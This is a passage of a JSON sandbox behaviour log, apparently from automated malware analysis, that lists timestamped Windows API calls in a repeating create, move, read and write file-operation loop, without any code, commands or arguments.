{"category": "filesystem", "timestamp": "2016-02-16 17:41:45,878", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,878", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,878", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,878", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,878", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,888", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,888", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,888", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,888", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,888", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,888", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,898", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,898", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,898", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,898", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,898", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,898", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,898", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,908", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,908", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,908", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,908", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,908", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,908", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,918", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,918", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,918", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,918", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,928", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,928", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,928", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,928", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,928", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,928", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,938", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,938", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,938", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,938", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,938", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,938", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,938", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,938", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,938", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,938", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,938", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,948", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,948", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,948", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,948", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,948", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,948", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,948", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,958", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,958", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,958", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,958", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,958", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,958", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,968", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,968", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,968", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,968", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,968", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,968", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,968", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,968", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,978", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,978", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,978", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,978", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,978", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,978", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,978", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,988", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,988", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,988", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,988", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,988", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,988", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,988", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,988", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,998", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,998", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,998", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,998", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,998", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,998", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,998", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,998", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,998", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,008", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,008", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,008", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,008", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,008", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,008", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,008", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,008", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,018", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,018", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,018", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,018", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,018", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,018", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,018", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,018", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,028", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,028", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,028", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,028", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,028", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,028", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,028", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,028", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,038", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,038", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,038", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,038", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,038", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,038", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,038", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,038", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,048", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,048", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,048", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,048", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,048", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,048", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,048", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,048", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,058", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,058", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,058", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,058", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,058", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,058", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,058", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,058", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,068", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,068", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,068", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,068", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,068", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,068", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,068", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,078", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,078", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,078", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,078", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,078", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,078", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,078", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,078", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,078", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,088", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,088", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,088", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,088", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,088", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,088", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,088", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,098", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,098", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,098", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,098", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,098", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,098", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,108", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,108", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,108", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,108", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,108", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,108", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,108", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,108", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,108", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,118", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,118", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,118", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,118", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,118", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,118", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,118", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,118", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,118", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,128", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,128", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,128", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,128", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,128", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,128", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,128", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,128", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,128", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,138", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,138", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,138", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,138", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,138", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,138", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,138", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,138", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,169", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,169", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,169", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,169", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,169", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,169", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,179", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,179", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,189", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,189", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,189", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,189", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,189", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,189", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,189", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,189", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,199", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,199", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,199", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,199", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,199", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,199", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,199", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,199", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,199", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,199", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,199", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,209", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,209", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,209", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,209", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,209", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,209", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,209", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,209", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,209", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,209", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,209", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,219", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,219", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,219", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,219", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,219", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,219", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,219", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,219", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,219", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,219", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,219", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,229", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,229", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,229", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,229", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,229", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,229", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,229", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,229", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,229", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,229", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,229", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,239", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,239", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,239", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,239", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,239", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,239", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,239", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,239", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,249", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,249", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,249", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,249", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,249", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,249", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,249", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,249", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,249", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,249", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,249", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,249", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,259", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,259", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,259", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,259", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,259", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,259", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,259", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,259", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,259", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,259", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,269", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,269", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,269", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,269", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,269", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,269", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,269", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,289", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,289", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,289", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,299", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,299", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,299", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,299", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,299", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,299", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,299", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,299", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,319", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,319", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,319", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,319", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,319", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,319", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,319", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,319", "api": "MoveFileWithProgressW"}, {"category": "filesystem", 